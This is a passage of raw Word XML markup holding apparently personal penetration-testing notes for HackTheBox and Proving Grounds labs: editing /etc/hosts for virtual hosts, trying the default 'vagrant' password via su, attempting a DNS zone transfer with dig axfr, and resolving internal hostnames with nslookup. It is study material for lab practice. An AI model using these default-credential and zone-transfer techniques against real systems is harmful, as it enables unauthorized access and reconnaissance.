        <w:t xml:space="preserve">In labs or CTFs like HackTheBox, Servers are often configured to respond differently based on subdomains or domains like s3.thetoppers.htb.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000334D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The /etc/hosts entry ensures you can interact with the server as intended, rather than being redirected or blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000334E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003351">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lwntgfk3gdqt" w:id="452"/>
      <w:bookmarkEnd w:id="452"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding users in Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003352">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003353">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One way is to look at the /home directory and seeing directories in there. Each user likely has their own directory in /home</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003354">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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56">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5lbqdgeko6j8" w:id="453"/>
      <w:bookmarkEnd w:id="453"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003357">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003358">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see a user vagrant, then try logging in with password "vagrant", as shown in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1122">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Blogger</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1434"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000335A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1434"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put in the password "vagrant"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000335B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000335E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000335F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003360">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9am44g81ut70" w:id="454"/>
      <w:bookmarkEnd w:id="454"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS (port 53)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003361">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003362">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was used in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bank HTB. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But it wasn't really used at all. So, idk if this is helpful at all.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003363">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003364">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If DNS is open on port 53, and you want to look for virtual hosts or subdomains, use this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003365">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dig axfr @&lt;DNS_Server_IP&gt; bank.htb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003366">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace &lt;DNS_Server_IP&gt; with your target IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003367">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">replace "bank.htb" with the hostname</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003368">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003369">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command asks the DNS server at $IP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="589"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Please give me all the DNS records you have for the internal zone."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000336B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000336C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the server is misconfigured and allows AXFR zone transfers to anyone (which is bad practice), it will return all records it knows — including hidden subdomains, alternate domains, internal hostnames, and other juicy details that you wouldn't discover with simple enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000336D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000336E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000336F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003370">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003371">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003372">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual Host vs. Subdomain:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003373">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1241"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a web server configuration that allows hosting multiple websites or services on the same server and IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1241"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A virtual host</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> responds based on the hostname (e.g., www.bank.htb) in the HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003375">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003376">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual hosts can be associated with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003377">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="646"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Subdomains (www.bank.htb, admin.bank.htb).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003378">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="646"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The root domain (bank.htb).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="646"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Different ports or IP addresses.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000337A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000337B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000337C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen from the Bank HTB, once you guess the virtual host (bank.htb), and then add 10.10.10.29 bank.htb into /etc/hosts, you can't just put 10.10.10.29 into the browser. You need to search bank.htb. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000337D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000337E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000337F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000338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81">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_db452a4lpxa8" w:id="455"/>
      <w:bookmarkEnd w:id="455"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find IP of a machine given its FQDN or hostname using nslookup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003382">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how you look up IP of a machine </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003383">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1828800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50" name="image45.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image45.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112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3384">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup INTERNALSRV1.BEYOND.COM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003385">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Ip is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.6.241</w:t>
      </w:r>
    </w:p>
